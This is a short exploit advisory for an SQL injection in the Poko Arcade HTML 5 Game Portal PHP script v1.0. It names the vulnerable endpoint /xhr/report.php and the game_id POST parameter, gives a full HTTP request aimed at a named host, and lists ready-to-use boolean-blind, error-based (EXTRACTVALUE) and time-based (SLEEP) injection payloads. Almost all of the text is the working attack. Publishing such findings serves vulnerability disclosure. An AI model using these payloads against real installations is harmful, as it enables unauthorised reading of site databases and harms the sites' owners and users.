# Exploit Title: Poko Arcade HTML 5 Game Portal PHP Script v1.0 - SQL Injection
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor: https://www.codester.com/items/48158/poko-arcade-html-5-game-portal-php-script
# Tested on: Arch Linux
# CVE: N/A
# Special Thanks: Ahmet Ümit Bayram

### Request ###

POST /xhr/report.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: /
x-requested-with: XMLHttpRequest
Cookie: PHPSESSID=77ugk4bmujg32iur8vtthovpu2
Content-Length: 328
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: poko.mvnstore.in
Connection: Keep-alive

game_id=1&game_name=Barbies%20Sketch&problem=e

###

### Parameter & Payloads ###

Parameter: game_id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: game_id=(SELECT (CASE WHEN (5478=5478) THEN 1 ELSE (SELECT 5855 UNION SELECT 3253) END))&game_name=Barbies Sketch&problem=e

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: game_id=1 AND EXTRACTVALUE(6033,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(6033=6033,1))),0x716a766b71))&game_name=Barbies Sketch&problem=e

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: game_id=1 AND (SELECT 8414 FROM (SELECT(SLEEP(5)))DwLw)&game_name=Barbies Sketch&problem=e

###